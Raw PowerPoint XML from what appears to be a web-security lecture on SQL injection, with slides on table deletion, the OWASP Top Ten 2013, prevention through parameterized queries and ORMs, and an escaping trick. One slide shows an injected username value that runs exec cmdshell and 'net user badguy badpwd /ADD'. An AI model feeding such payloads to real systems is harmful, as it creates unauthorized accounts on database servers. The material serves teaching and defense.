              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Deletes user table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Similarly:   attacker can add users,  reset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pwds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>,  etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49"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D07F75-139E-4502-A23C-6822D349B884}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305602" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>worse …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5666118" y="4159770"/>
            <a:ext cx="2258682"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305603" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447800"/>
            <a:ext cx="8001000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose user = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′ ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>			′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>badpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/ ADD --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Then script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username=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exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If SQL server context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>runs as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”, attacker gets account on DB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="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6917E9-C890-4124-BBEF-2FBCA2116E52}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99330" name="Picture 2" descr="Exploits of a Mom"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1371600"/>
            <a:ext cx="8444964" cy="2599426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="4876800"/>
            <a:ext cx="6756721" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let’s see how the attack described in this cartoon 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Preventing SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Never build SQL commands yourself !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use  parameterized/prepared  SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use  ORM  framework</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Top Ten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>             (2013)</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1451176"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="1457960"/>
          <a:ext cx="8001000" cy="4668519"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="533400"/>
                <a:gridCol w="2209800"/>
                <a:gridCol w="52578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A-1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Untrusted data is sent to an interpreter as part of a command or query.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>A-2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Authentication and Session Management</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Attacks passwords, keys, or session tokens, or exploit other implementation flaws to assume other users’ identities.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>A-3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Cross-site scripting</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>An application takes untrusted data and sends it to a web browser without proper validation or escaping</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Various implementation problems</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>…</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>expose a file, directory, or database key without access</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> control check, …misconfiguration, …missing function-level access control</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>A-8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Cross-site request forgery</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A</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logged-on victim’s browser sends a forged HTTP request, including the victim’s session cookie and other authentication information</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2504721" y="6457890"/>
            <a:ext cx="5948103" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>https://www.owasp.org/index.php/Top_10_2013-Top_10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26730133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89B51D48-A365-4BE1-9B85-BCD6930D4F38}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2757488"/>
            <a:ext cx="2743200" cy="1890712"/>
            <a:chOff x="3264" y="1641"/>
            <a:chExt cx="1728" cy="1191"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 14"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3264" y="1641"/>
              <a:ext cx="1728" cy="1191"/>
              <a:chOff x="3552" y="249"/>
              <a:chExt cx="1728" cy="1191"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1333258" name="Text Box 10"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3557" y="249"/>
                <a:ext cx="1099"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5c</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400">
                    <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                  </a:rPr>
                  <a:t>  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" b="1">
                    <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1333259" name="Text Box 11"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3552" y="633"/>
                <a:ext cx="1633"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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" u="sng"/>
                  <a:t>27</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800"/>
                  <a:t>  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800">
                    <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                  </a:rPr>
                  <a:t>  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" b="1">
                    <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                  </a:rPr>
                  <a:t>¿′</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US">
                    <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 13"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3552" y="1017"/>
                <a:ext cx="1728" cy="423"/>
                <a:chOff x="3504" y="1161"/>
                <a:chExt cx="1728" cy="423"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1333254" name="Picture 6"/>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId3" cstate="print"/>
                <a:srcRect l="65089" t="48508" r="31905" b="48581"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4681" y="1197"/>
                  <a:ext cx="551" cy="387"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="12700" algn="ctr">
                  <a:noFill/>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd type="none" w="lg" len="med"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1333260" name="Text Box 12"/>
                <p:cNvSpPr txBox="1">
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3504" y="1161"/>
                  <a:ext cx="1417"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 5c</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="2800"/>
                    <a:t>  </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="2800">
                      <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                    </a:rPr>
                    <a:t>  </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US">
                      <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                    </a:rPr>
                    <a:t> </a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1333264" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3264" y="1641"/>
